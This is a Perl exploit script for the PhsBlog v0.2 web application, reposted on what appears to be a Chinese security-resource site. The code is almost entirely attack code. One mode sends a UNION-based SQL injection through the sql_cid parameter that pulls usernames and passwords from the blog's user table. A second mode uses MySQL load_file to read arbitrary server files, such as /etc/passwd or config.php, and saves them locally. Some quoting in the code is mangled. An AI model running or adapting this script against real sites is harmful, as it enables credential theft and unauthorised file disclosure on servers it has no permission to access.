phsBlog 0.2 Bypass SQL Injection Filtering Exploit

2023-12-04 0 322

#!/usr/bin/perl

#—————————————————————-

#

#Script : PhsBlog v0.2

#

#Type : Bypass Sql injection Filtering Exploit

#

#Method : GET

#

#Risk : High

#

#—————————————————————-

#

#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

#

#My Official Website : HTTP://FEREIDANI.IR

#

#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

#

#—————————————————————-

#

#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

#

#—————————————————————-

#

#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip

#

#—————————————————————-

#

# Tnx : God

#

# HTTP://IRCRASH.COM

#

#—————————————————————-

use LWP;

use HTTP::Request;

use Getopt::Long;

$scriptname="PhsBlog v0.2";

sub header

{

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************";

}

sub usage

{

print "

* Usage : perl $0 http://Example/

****************************************************

";

}

$url = ($ARGV[0]);

if(!$url)

{

header();

usage();

exit;

}

if($url !~ /\\//){$url = $url."/";}

if($url !~ /http:\\/\\//){$url = "http://".$url;}

sub xpl1()

{

#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)

$vul = "/index.php?sql_cid=999\’union select 0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12 from phsblog_users/*";

$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( \’Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9\’ );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type(\’application/x-www-form-urlencoded\’);

$req->header("content-length" => $contlen);

$req->content($poststring);

$response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string();

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

@password = split(/Password:/,$content);

$password = @password[1];

@password = split(/<endpass>/,$password);

$password = @password[0];

if(!$name && !$password)

{

print "\\n\\n";

print "!Exploit failed ! :(\\n\\n";

exit;

}

print "\\n Username: ".$name."\\n\\n";

print " Password: " .$password."\\n\\n";

}

#XPL2

sub xpl2()

{

print "\\n Example For File Address : /home/user/public_html/config.php\\n Or /etc/passwd";

print "\\n Enter File Address :";

$fil3 = <stdin>;

#index.php?sql_cid=999\’union select 0,1,2,3,4,concat(0x4c6f67696e3a,load_file(\’$fil3\’),0x3c656e64757365723e),6,7,8,9,10,11,12 from phsblog_users/*

$vul = "?show=pickup&sid=99999\’ union select 0,concat(0x4c6f67696e3a,load_file(\’$fil3\’),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13 from mysql.user/*";

$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( \’Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9\’ );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type(\’application/x-www-form-urlencoded\’);

$req->header("content-length" => $contlen);

$req->content($poststring);

$response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string();

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

if(!$name && !$password)

{

print "\\n\\n";

print "!Exploit failed ! :(\\n\\n";

exit;

}

open (FILE, ">".source.".txt");

print FILE $name;

close (FILE);

print " File Save In source.txt\\n";

print "";

}

#XPL2 END

#Starting;

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************

* Mod Options : *

* Mod 1 : Find Script username and password *

* Mod 2 : File Disclosure(not work in many servers)*

****************************************************";

print "\\n \\n Enter Mod : ";

$mod=<stdin>;

if ($mod=="1" or $mod=="2") { print "\\n Exploiting ………….. \\n"; } else { print "\\n Unknown Mod ! \\n Exploit Failed !"; };

if ($mod=="1") { xpl1(); };

if ($mod=="2") { xpl2(); };

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit phsBlog 0.2 Bypass SQL Injection Filtering Exploit https://www.u-9.cn/security/exploit/71822.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务